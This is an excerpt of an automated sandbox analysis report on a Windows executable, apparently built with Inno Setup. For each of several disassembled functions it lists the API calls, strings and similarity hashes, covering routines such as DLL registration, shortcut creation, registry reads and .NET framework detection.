                                                                                Function 00458184 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237filesynchronizationprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                                                • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                                                • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                                                • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                                                • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                                                • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
                                                                                • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                • API String ID: 4012871263-351310198
                                                                                • Opcode ID: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                                                • Instruction ID: 29107a7cf73729034b65a1fcaaf08eab05738b19563c620e852bf3134b102344
                                                                                • Opcode Fuzzy Hash: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                                                • Instruction Fuzzy Hash: 46914170A002099BDB10EFA9C845B9EB7B4EB05305F50856FED14FB283DF7899498F69
                                                                                Function 0041CA1C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                • 73EA4C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                • 73EA6180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                • 73EA4C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                • 73EA4C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                • 73E98830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                • 73E922A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                • 73EA4D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ObjectSelect$E922E98830Text$A570A6180DeleteFillRect
                                                                                • String ID:
                                                                                • API String ID: 1952589944-0
                                                                                • Opcode ID: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                • Opcode Fuzzy Hash: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                                                • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                Function 00497DA0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                                                • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                                                • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                                                  • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                • API String ID: 2000705611-3672972446
                                                                                • Opcode ID: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                                                • Instruction ID: d71e95358f961f9c8085103628ed7ebfe7aaf39cab9d6a0a027eda6f41515cae
                                                                                • Opcode Fuzzy Hash: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                                                • Instruction Fuzzy Hash: C291B530A042449FDF11EBA9DC52BAE7FA4EF4A304F51447BF500AB292DA7DAC05CB59
                                                                                Function 0045AA3C Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                • API String ID: 1452528299-3112430753
                                                                                • Opcode ID: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                                                • Instruction ID: f5e388fb48f96f1c0466849e1c52bdf0d536658550fb6e74c3a20cf80cd44526
                                                                                • Opcode Fuzzy Hash: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                                                • Instruction Fuzzy Hash: 2271AE707002445BDB01EB69D8427AE77A6AF48316F50856BFC01DB383CA7C9A5DC79A
                                                                                Function 0045CF24 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 0045CF3E
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                                                • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                                                • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                                                • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                                                  • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                • API String ID: 59345061-4263478283
                                                                                • Opcode ID: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                                                • Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
                                                                                • Opcode Fuzzy Hash: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                                                • Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
                                                                                Function 00456550 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 282comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
                                                                                • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
                                                                                • SysFreeString.OLEAUT32(?), ref: 00456745
                                                                                Strings
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
                                                                                • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
                                                                                • CoCreateInstance, xrefs: 004565C3
                                                                                • IPersistFile::Save, xrefs: 00456814
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
                                                                                • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
                                                                                • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
                                                                                • IPropertyStore::Commit, xrefs: 00456795
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstance$FreeString
                                                                                • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                                • API String ID: 308859552-3936712486
                                                                                • Opcode ID: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                                                • Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
                                                                                • Opcode Fuzzy Hash: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                                                • Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
                                                                                Function 0041B3BC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73EA4C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                • 73EA4C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                • 73EA6180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                • 73E9A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                • 73EA4C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                • 73E9A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Object$Select$Delete$A480A570A6180Stretch
                                                                                • String ID:
                                                                                • API String ID: 1888863034-0
                                                                                • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                Function 00472DB8 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
                                                                                • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
                                                                                • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
                                                                                • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                • API String ID: 971782779-3668018701
                                                                                • Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                • Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
                                                                                • Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                • Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
                                                                                Function 00454860 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
                                                                                  • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
                                                                                • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
                                                                                Strings
                                                                                • , xrefs: 004548EA
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
                                                                                • RegOpenKeyEx, xrefs: 004548FC
                                                                                • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$FormatMessageOpen
                                                                                • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                • API String ID: 2812809588-1577016196
                                                                                • Opcode ID: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                                                • Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
                                                                                • Opcode Fuzzy Hash: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                                                • Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
                                                                                Function 004597BC Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
                                                                                Strings
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
                                                                                • .NET Framework version %s not found, xrefs: 0045996D
                                                                                • v1.1.4322, xrefs: 00459926
                                                                                • v2.0.50727, xrefs: 004598BF
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
                                                                                • v4.0.30319, xrefs: 00459855
                                                                                • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
                                                                                • .NET Framework not found, xrefs: 00459981
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Close$Open
                                                                                • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                • API String ID: 2976201327-446240816
                                                                                • Opcode ID: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                                                • Instruction ID: 729b419896cd5506e065475e0ee5015c208a67e93f4f54458093df2d8724af3d
                                                                                • Opcode Fuzzy Hash: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
